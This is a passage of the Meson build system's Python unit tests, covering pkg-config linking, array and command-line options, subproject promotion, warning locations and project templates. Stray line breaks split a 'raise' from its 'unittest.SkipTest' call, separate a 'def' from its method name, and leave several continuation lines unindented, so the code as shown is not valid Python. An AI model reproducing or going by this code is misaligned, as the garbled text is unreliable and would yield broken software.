        self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
        # Run the test
        try:
            self.init(tdir)
            self.build()
            self.run_tests()
        finally:
            os.unlink(shlibfile)
            if mesonbuild.mesonlib.is_windows():
                # Clean up all the garbage MSVC writes in the
                # source tree.
                for fname in glob(os.path.join(tdir, 'alexandria.*')):
                    if os.path.splitext(fname)[1] not in ['.c', '.h']:
                        os.unlink(fname)

    @skipIfNoPkgconfig
    def test_pkgconfig_static(self):
        '''
        Test that the we prefer static libraries when `static: true` is
        passed to dependency() with pkg-config. Can't be an ordinary test
        because we need to build libs and try to find them from meson.build

        Also test that it's not a hard error to have unsatisfiable library deps
        since system libraries -lm will never be found statically.
        https://github.com/mesonbuild/meson/issues/2785
        '''
        (cc, stlinker, objext, shext) = self.detect_prebuild_env()
        testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
        source = os.path.join(testdir, 'foo.c')
        objectfile = os.path.join(testdir, 'foo.' + objext)
        stlibfile = os.path.join(testdir, 'libfoo.a')
        impfile = os.path.join(testdir, 'foo.lib')
        if cc.get_argument_syntax() == 'msvc':
            shlibfile = os.path.join(testdir, 'foo.' + shext)
        elif is_cygwin():
            shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
        else:
            shlibfile = os.path.join(testdir, 'libfoo.' + shext)
        # Build libs
        self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
        self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
        # Run test
        try:
            self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
            self.build()
            self.run_tests()
        finally:
            os.unlink(stlibfile)
            os.unlink(shlibfile)
            if mesonbuild.mesonlib.is_windows():
                # Clean up all the garbage MSVC writes in the
                # source tree.
                for fname in glob(os.path.join(testdir, 'foo.*')):
                    if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
                        os.unlink(fname)

    @skipIfNoPkgconfig
    @mock.patch.dict(os.environ)
    def test_pkgconfig_gen_escaping(self):
        # Link/compile args produced by pkgconfig-gen must quote paths that
        # contain spaces (checked via a prefix with a space in it).
        testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
        prefix = '/usr/with spaces'
        libdir = 'lib'
        self.init(testdir, extra_args=['--prefix=' + prefix,
                                       '--libdir=' + libdir])
        # Find foo dependency
        os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
        env = get_fake_env(testdir, self.builddir, self.prefix)
        kwargs = {'required': True, 'silent': True}
        foo_dep = PkgConfigDependency('libfoo', env, kwargs)
        # Ensure link_args are properly quoted
        libdir = PurePath(prefix) / PurePath(libdir)
        link_args = ['-L' + libdir.as_posix(), '-lfoo']
        self.assertEqual(foo_dep.get_link_args(), link_args)
        # Ensure include args are properly quoted
        incdir = PurePath(prefix) / PurePath('include')
        cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
        # pkg-config and pkgconf does not respect the same order
        self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))

    def test_array_option_change(self):
        # Array options must be changeable via 'meson configure -Dlist=...'.
        def get_opt():
            opts = self.introspect('--buildoptions')
            for x in opts:
                if x.get('name') == 'list':
                    return x
            raise Exception(opts)

        expected = {
            'name': 'list',
            'description': 'list',
            'section': 'user',
            'type': 'array',
            'value': ['foo', 'bar'],
            'machine': 'any',
        }
        tdir = os.path.join(self.unit_test_dir, '19 array option')
        self.init(tdir)
        original = get_opt()
        self.assertDictEqual(original, expected)

        expected['value'] = ['oink', 'boink']
        self.setconf('-Dlist=oink,boink')
        changed = get_opt()
        self.assertEqual(changed, expected)

    def test_array_option_bad_change(self):
        # Setting an array option to a value outside its choices must fail
        # and leave the stored value untouched.
        def get_opt():
            opts = self.introspect('--buildoptions')
            for x in opts:
                if x.get('name') == 'list':
                    return x
            raise Exception(opts)

        expected = {
            'name': 'list',
            'description': 'list',
            'section': 'user',
            'type': 'array',
            'value': ['foo', 'bar'],
            'machine': 'any',
        }
        tdir = os.path.join(self.unit_test_dir, '19 array option')
        self.init(tdir)
        original = get_opt()
        self.assertDictEqual(original, expected)
        with self.assertRaises(subprocess.CalledProcessError):
            self.setconf('-Dlist=bad')
        changed = get_opt()
        self.assertDictEqual(changed, expected)

    def test_array_option_empty_equivalents(self):
        """Array options treat -Dopt=[] and -Dopt= as equivalent."""
        def get_opt():
            opts = self.introspect('--buildoptions')
            for x in opts:
                if x.get('name') == 'list':
                    return x
            raise Exception(opts)

        expected = {
            'name': 'list',
            'description': 'list',
            'section': 'user',
            'type': 'array',
            'value': [],
            'machine': 'any',
        }
        tdir = os.path.join(self.unit_test_dir, '19 array option')
        self.init(tdir, extra_args='-Dlist=')
        original = get_opt()
        self.assertDictEqual(original, expected)

    def opt_has(self, name, value):
        # Assert that introspected build options contain `name` with `value`.
        res = self.introspect('--buildoptions')
        found = False
        for i in res:
            if i['name'] == name:
                self.assertEqual(i['value'], value)
                found = True
                break
        self.assertTrue(found, "Array option not found in introspect data.")

    def test_free_stringarray_setting(self):
        # Free-form (choice-less) array options accept both comma-separated
        # and list-literal syntax on the command line.
        testdir = os.path.join(self.common_test_dir, '41 options')
        self.init(testdir)
        self.opt_has('free_array_opt', [])
        self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
        self.opt_has('free_array_opt', ['foo', 'bar'])
        self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
        self.opt_has('free_array_opt', ['a,b', 'c,d'])

    # When running under Travis Mac CI, the file updates seem to happen
    # too fast so the timestamps do not get properly updated.
    # Call this method before file operations in appropriate places
    # to make things work.
    def mac_ci_delay(self):
        # 1-second sleep so that mtime-based change detection sees the
        # subsequent file updates (macOS CI only).
        if is_osx() and is_ci():
            import time
            time.sleep(1)

    def test_options_with_choices_changing(self) -> None:
        """Detect when options like arrays or combos have their choices change."""
        testdir = Path(os.path.join(self.unit_test_dir, '85 change option choices'))
        options1 = str(testdir / 'meson_options.1.txt')
        options2 = str(testdir / 'meson_options.2.txt')

        # Test that old options are changed to the new defaults if they are not valid
        real_options = str(testdir / 'meson_options.txt')
        self.addCleanup(os.unlink, real_options)

        shutil.copy(options1, real_options)
        self.init(str(testdir))
        self.mac_ci_delay()
        shutil.copy(options2, real_options)
        self.build()
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == 'combo':
                self.assertEqual(item['value'], 'b')
                self.assertEqual(item['choices'], ['b', 'c', 'd'])
            # NOTE(review): the loop checks an option named 'arr' but the init
            # below passes '-Darray=b,c' — confirm against the test case's
            # meson_options files which name is correct.
            elif item['name'] == 'arr':
                self.assertEqual(item['value'], ['b'])
                self.assertEqual(item['choices'], ['b', 'c', 'd'])
        self.wipe()
        self.mac_ci_delay()

        # When the old options are valid they should remain
        shutil.copy(options1, real_options)
        self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c'])
        self.mac_ci_delay()
        shutil.copy(options2, real_options)
        self.build()
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == 'combo':
                self.assertEqual(item['value'], 'c')
                self.assertEqual(item['choices'], ['b', 'c', 'd'])
            elif item['name'] == 'arr':
                self.assertEqual(item['value'], ['b', 'c'])
                self.assertEqual(item['choices'], ['b', 'c', 'd'])

    def test_subproject_promotion(self):
        # 'meson wrap promote' must copy nested subprojects up into the
        # top-level subprojects dir, and refuse ambiguous/invalid requests.
        testdir = os.path.join(self.unit_test_dir, '12 promote')
        workdir = os.path.join(self.builddir, 'work')
        shutil.copytree(testdir, workdir)
        spdir = os.path.join(workdir, 'subprojects')
        s3dir = os.path.join(spdir, 's3')
        scommondir = os.path.join(spdir, 'scommon')
        self.assertFalse(os.path.isdir(s3dir))
        subprocess.check_call(self.wrap_command + ['promote', 's3'],
                              cwd=workdir,
                              stdout=subprocess.DEVNULL)
        self.assertTrue(os.path.isdir(s3dir))
        self.assertFalse(os.path.isdir(scommondir))
        # 'scommon' exists in more than one place, so a bare name must fail...
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
                                            cwd=workdir,
                                            stdout=subprocess.DEVNULL), 0)
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
                                            cwd=workdir,
                                            stderr=subprocess.DEVNULL), 0)
        self.assertFalse(os.path.isdir(scommondir))
        # ...while the full path works.
        subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
        self.assertTrue(os.path.isdir(scommondir))
        promoted_wrap = os.path.join(spdir, 'athing.wrap')
        self.assertFalse(os.path.isfile(promoted_wrap))
        subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
        self.assertTrue(os.path.isfile(promoted_wrap))
        self.init(workdir)
        self.build()

    def test_subproject_promotion_wrap(self):
        # Same as above but for .wrap files: ambiguous names fail, full
        # paths succeed.
        testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
        workdir = os.path.join(self.builddir, 'work')
        shutil.copytree(testdir, workdir)
        spdir = os.path.join(workdir, 'subprojects')

        ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
                                            cwd=workdir,
                                            stdout=subprocess.DEVNULL), 0)
        self.assertFalse(os.path.isfile(ambiguous_wrap))
        subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
        self.assertTrue(os.path.isfile(ambiguous_wrap))

    def test_warning_location(self):
        # Warnings must be prefixed with the meson.build path and line that
        # triggered them, relative to the invocation directory.
        tdir = os.path.join(self.unit_test_dir, '22 warning location')
        out = self.init(tdir)
        for expected in [
            r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
            r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
            r'meson.build:6: WARNING: a warning of some sort',
            r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
            r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
            r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
            r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
        ]:
            self.assertRegex(out, re.escape(expected))

        for wd in [
            self.src_root,
            self.builddir,
            os.getcwd(),
        ]:
            self.new_builddir()
            out = self.init(tdir, workdir=wd)
            expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
            relwd = relpath(self.src_root, wd)
            if relwd != '.':
                expected = os.path.join(relwd, expected)
            expected = '\n' + expected + ':'
            self.assertIn(expected, out)

    def test_error_location_path(self):
        '''Test locations in meson errors contain correct paths'''
        # this list contains errors from all the different steps in the
        # lexer/parser/interpreter we have tests for.
        for (t, f) in [
            ('10 out of bounds', 'meson.build'),
            ('18 wrong plusassign', 'meson.build'),
            ('61 bad option argument', 'meson_options.txt'),
            ('102 subdir parse error', os.path.join('subdir', 'meson.build')),
            ('103 invalid option file', 'meson_options.txt'),
        ]:
            tdir = os.path.join(self.src_root, 'test cases', 'failing', t)

            for wd in [
                self.src_root,
                self.builddir,
                os.getcwd(),
            ]:
                try:
                    self.init(tdir, workdir=wd)
                except subprocess.CalledProcessError as e:
                    expected = os.path.join('test cases', 'failing', t, f)
                    relwd = relpath(self.src_root, wd)
                    if relwd != '.':
                        expected = os.path.join(relwd, expected)
                    expected = '\n' + expected + ':'
                    self.assertIn(expected, e.output)
                else:
                    self.fail('configure unexpectedly succeeded')

    def test_permitted_method_kwargs(self):
        # Unknown kwargs passed to methods must produce warnings, not errors.
        tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
        out = self.init(tdir)
        for expected in [
            r'WARNING: Passed invalid keyword argument "prefixxx".',
            r'WARNING: Passed invalid keyword argument "argsxx".',
            r'WARNING: Passed invalid keyword argument "invalidxx".',
        ]:
            self.assertRegex(out, re.escape(expected))

    def test_templates(self):
        # 'meson init' templates must configure and build for every language
        # whose compiler sanity-checks on this machine.
        ninja = detect_ninja()
        if ninja is None:
            raise
unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
        langs = ['c']
        env = get_fake_env()
        for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']:
            try:
                comp = getattr(env, f'detect_{l}_compiler')(MachineChoice.HOST)
                # Only test languages whose compiler actually works here.
                with tempfile.TemporaryDirectory() as d:
                    comp.sanity_check(d, env)
                langs.append(l)
            except EnvironmentException:
                pass

        for lang in langs:
            for target_type in ('executable', 'library'):
                # test empty directory
                with tempfile.TemporaryDirectory() as tmpdir:
                    self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
                              workdir=tmpdir)
                    self._run(self.setup_command + ['--backend=ninja', 'builddir'],
                              workdir=tmpdir)
                    self._run(ninja,
                              workdir=os.path.join(tmpdir, 'builddir'))
            # test directory with existing code file
            if lang in {'c', 'cpp', 'd'}:
                with tempfile.TemporaryDirectory() as tmpdir:
                    with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
                        f.write('int main(void) {}')
                    self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
            elif lang in {'java'}:
                with tempfile.TemporaryDirectory() as tmpdir:
                    with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
                        f.write('public class Foo { public static void main() {} }')
                    self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)

    def test_compiler_run_command(self):
        '''
        The test checks that the compiler object can be passed to
        run_command().
        '''
        testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
        self.init(testdir)

    def test_identical_target_name_in_subproject_flat_layout(self):
        '''
        Test that identical targets in different subprojects do not collide
        if layout is flat.
        '''
        testdir = os.path.join(self.common_test_dir, '173 identical target name in subproject flat layout')
        self.init(testdir, extra_args=['--layout=flat'])
        self.build()

    def test_identical_target_name_in_subdir_flat_layout(self):
        '''
        Test that identical targets in different subdirs do not collide if
        layout is flat.
        '''
        testdir = os.path.join(self.common_test_dir, '182 same target name flat layout')
        self.init(testdir, extra_args=['--layout=flat'])
        self.build()

    def test_flock(self):
        # Taking the build-dir lock twice must raise MesonException.
        exception_raised = False
        with tempfile.TemporaryDirectory() as tdir:
            os.mkdir(os.path.join(tdir, 'meson-private'))
            with BuildDirLock(tdir):
                try:
                    with BuildDirLock(tdir):
                        pass
                except MesonException:
                    exception_raised = True
        self.assertTrue(exception_raised, 'Double locking did not raise exception.')

    @unittest.skipIf(is_osx(), 'Test not applicable to OSX')
    def test_check_module_linking(self):
        """
        Test that link_with: a shared module issues a warning
        https://github.com/mesonbuild/meson/issues/2865
        (That an error is raised on OSX is exercised by test failing/78)
        """
        tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
        out = self.init(tdir)
        msg = ('WARNING: target links against shared modules. This is not '
               'recommended as it is not supported on some platforms')
        self.assertIn(msg, out)

    def test_ndebug_if_release_disabled(self):
        # b_ndebug=if-release with --buildtype=release must define NDEBUG.
        testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
        self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
        self.build()
        exe = os.path.join(self.builddir, 'main')
        self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())

    def test_ndebug_if_release_enabled(self):
        # b_ndebug=if-release with a non-release buildtype must NOT define NDEBUG.
        testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
        self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
        self.build()
        exe = os.path.join(self.builddir, 'main')
        self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())

    def test_guessed_linker_dependencies(self):
        '''
        Test that meson adds dependencies for libraries based on the final
        linker command line.
        '''
        testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
        testdirlib = os.path.join(testdirbase, 'lib')

        extra_args = None
        libdir_flags = ['-L']
        env = get_fake_env(testdirlib, self.builddir, self.prefix)
        if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
            # msvc-like compiler, also test it with msvc-specific flags
            libdir_flags += ['/LIBPATH:', '-LIBPATH:']
        else:
            # static libraries are not linkable with -l with msvc because meson installs them
            # as .a files which unix_args_to_native will not know as it expects libraries to use
            # .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
            # this tests needs to use shared libraries to test the path resolving logic in the
            # dependency generation code path.
            extra_args = ['--default-library', 'static']

        initial_builddir = self.builddir
        initial_installdir = self.installdir

        for libdir_flag in libdir_flags:
            # build library
            self.new_builddir()
            self.init(testdirlib, extra_args=extra_args)
            self.build()
            self.install()
            libbuilddir = self.builddir
            installdir = self.installdir
            libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')

            # build user of library
            self.new_builddir()
            # replace is needed because meson mangles platform paths passed via LDFLAGS
            self.init(os.path.join(testdirbase, 'exe'),
                      override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
            self.build()
            self.assertBuildIsNoop()

            # rebuild library
            exebuilddir = self.builddir
            self.installdir = installdir
            self.builddir = libbuilddir
            # Microsoft's compiler is quite smart about touching import libs on changes,
            # so ensure that there is actually a change in symbols.
            self.setconf('-Dmore_exports=true')
            self.build()
            self.install()
            # no ensure_backend_detects_changes needed because self.setconf did that already

            # assert user of library will be rebuild
            self.builddir = exebuilddir
            self.assertRebuiltTarget('app')

        # restore dirs for the next test case
        self.installdir = initial_builddir
        self.builddir = initial_installdir

    def test_conflicting_d_dash_option(self):
        # Passing the same option via -D and --flag at once must be rejected.
        testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as e:
            self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
            # Just to ensure that we caught the correct error
            # NOTE(review): `e.stderr` on an assertRaises context looks suspect
            # (the context exposes `exception`, not `stderr`) — confirm this line
            # is actually reached / intended.
            self.assertIn('as both', e.stderr)

    def _test_same_option_twice(self, arg, args):
        # Shared helper: set the same option twice at setup time and check the
        # last value ('bar') wins.
        testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
        self.init(testdir, extra_args=args)
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == arg:
                self.assertEqual(item['value'], 'bar')
                return
        raise Exception('Missing {} value?'.format(arg))

    def test_same_dash_option_twice(self):
        self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])

    def test_same_d_option_twice(self):
        self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])

    def test_same_project_d_option_twice(self):
        self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])

    def _test_same_option_twice_configure(self, arg, args):
        # Shared helper: same as above but setting the option twice via
        # `meson configure` after the initial setup.
        testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
        self.init(testdir)
        self.setconf(args)
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == arg:
                self.assertEqual(item['value'], 'bar')
                return
        raise Exception('Missing {} value?'.format(arg))

    def test_same_dash_option_twice_configure(self):
        self._test_same_option_twice_configure(
            'bindir', ['--bindir=foo', '--bindir=bar'])

    def test_same_d_option_twice_configure(self):
        self._test_same_option_twice_configure(
            'bindir', ['-Dbindir=foo', '-Dbindir=bar'])

    def
 test_same_project_d_option_twice_configure(self):
        self._test_same_option_twice_configure(
            'one', ['-Done=foo', '-Done=bar'])

    def test_command_line(self):
        testdir = os.path.join(self.unit_test_dir, '34 command line')

        # Verify default values when passing no args that affect the
        # configuration, and as a bonus, test that --profile-self works.
        self.init(testdir, extra_args=['--profile-self', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('default_library')].value, 'static')
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
        self.assertEqual(obj.options[OptionKey('set_sub_opt')].value, True)
        self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'default3')
        self.wipe()

        # warning_level is special, it's --warnlevel instead of --warning-level
        # for historical reasons
        self.init(testdir, extra_args=['--warnlevel=2', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
        self.setconf('--warnlevel=3')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
        self.wipe()

        # But when using -D syntax, it should be 'warning_level'
        self.init(testdir, extra_args=['-Dwarning_level=2', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
        self.setconf('-Dwarning_level=3')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
        self.wipe()

        # Mixing --option and -Doption is forbidden
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
        # The error surfaces differently depending on whether meson ran
        # in-process (RuntimeError) or as a subprocess (CalledProcessError).
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn('as both', cm.exception.output)
        else:
            self.assertIn('as both',
 str(cm.exception))
        self.init(testdir)
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn('as both', cm.exception.output)
        else:
            self.assertIn('as both', str(cm.exception))
        self.wipe()

        # --default-library should override default value from project()
        self.init(testdir, extra_args=['--default-library=both', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('default_library')].value, 'both')
        self.setconf('--default-library=shared')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
        if self.backend is Backend.ninja:
            # reconfigure target works only with ninja backend
            self.build('reconfigure')
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
        self.wipe()

        # Should warn on unknown options
        out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
        self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
        self.wipe()

        # Should fail on malformed option
        msg = "Option 'foo' must have a value separated by equals sign."
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.init(testdir, extra_args=['-Dfoo'])
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn(msg, cm.exception.output)
        else:
            self.assertIn(msg, str(cm.exception))
        self.init(testdir)
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.setconf('-Dfoo')
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn(msg, cm.exception.output)
        else:
            self.assertIn(msg, str(cm.exception))
        self.wipe()

        # It is not an error to set wrong option for unknown subprojects or
        # language because we don't have control on which one will be selected.
        self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
        self.wipe()

        # Test we can set subproject option
        self.init(testdir, extra_args=['-Dsubp:subp_opt=foo', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'foo')
        self.wipe()

        # c_args value should be parsed with split_args
        self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])

        self.setconf('-Dc_args="foo bar" one two')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['foo bar', 'one', 'two'])
        self.wipe()

        # A literal '%' in an option value must survive the parser.
        self.init(testdir, extra_args=['-Dset_percent_opt=myoption%', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('set_percent_opt')].value, 'myoption%')
        self.wipe()

        # Setting a 2nd time the same option should override the first value
        try:
            self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
                                           '-Dbuildtype=plain',
                                           '-Dbuildtype=release',
                                           '-Db_sanitize=address', '-Db_sanitize=thread',
                                           '-Dc_args=-Dfoo', '-Dc_args=-Dbar',
                                           '-Db_lundef=false', '--fatal-meson-warnings'])
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.options[OptionKey('bindir')].value, 'bar')
            self.assertEqual(obj.options[OptionKey('buildtype')].value, 'release')
            self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'thread')
            self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dbar'])
            self.setconf(['--bindir=bar', '--bindir=foo',
                          '-Dbuildtype=release', '-Dbuildtype=plain',
                          '-Db_sanitize=thread', '-Db_sanitize=address',
                          '-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.options[OptionKey('bindir')].value, 'foo')
            self.assertEqual(obj.options[OptionKey('buildtype')].value, 'plain')
            self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'address')
            self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo'])
            self.wipe()
        except KeyError:
            # Ignore KeyError, it happens on CI for compilers that does not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 an earlier versions.
            pass

    def test_warning_level_0(self):
        # Project declares warning_level=0 as its default; check the default
        # and that both --warnlevel and -Dwarning_level can override it.
        testdir = os.path.join(self.common_test_dir, '208 warning level 0')

        # Verify default values when passing no args
        self.init(testdir)
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
        self.wipe()

        # verify we can override w/ --warnlevel
        self.init(testdir, extra_args=['--warnlevel=1'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
        self.setconf('--warnlevel=0')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
        self.wipe()

        # verify we can override w/ -Dwarning_level
        self.init(testdir, extra_args=['-Dwarning_level=1'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
        self.setconf('-Dwarning_level=0')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
        self.wipe()

    def test_feature_check_usage_subprojects(self):
        testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
        out = self.init(testdir)
        # Parent project warns correctly
        self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
        # Subprojects warn correctly
        self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
        self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
        # Subproject has a new-enough meson_version, no warning
        self.assertNotRegex(out, "WARNING: Project targeting.*Python")
        # Ensure a summary is printed in the subproject and the outer project
        self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
        self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
        self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
        self.assertRegex(out, " * 0.47.0: {'dict'}")

    def test_configure_file_warnings(self):
        testdir =
 os.path.join(self.common_test_dir, "14 configure file")
        out = self.init(testdir)
        self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
        self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
        self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
        self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
        # Warnings for configuration files that are overwritten.
        self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
        self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
        self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
        self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
        self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
        # No warnings about empty configuration data objects passed to files with substitutions
        self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
        self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
        with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
            self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
        with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
            self.assertEqual(f.read().strip(), b'')
        self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")

    def test_dirs(self):
        # Running `meson setup` with no build directory argument must fail
        # with a helpful message; with a build dir it must succeed.
        with tempfile.TemporaryDirectory() as containing:
            with tempfile.TemporaryDirectory(dir=containing) as srcdir:
                mfile = os.path.join(srcdir, 'meson.build')
                of = open(mfile, 'w')
                of.write("project('foobar', 'c')\n")
                of.close()
                pc = subprocess.run(self.setup_command,
                                    cwd=srcdir,
                                    stdout=subprocess.PIPE,
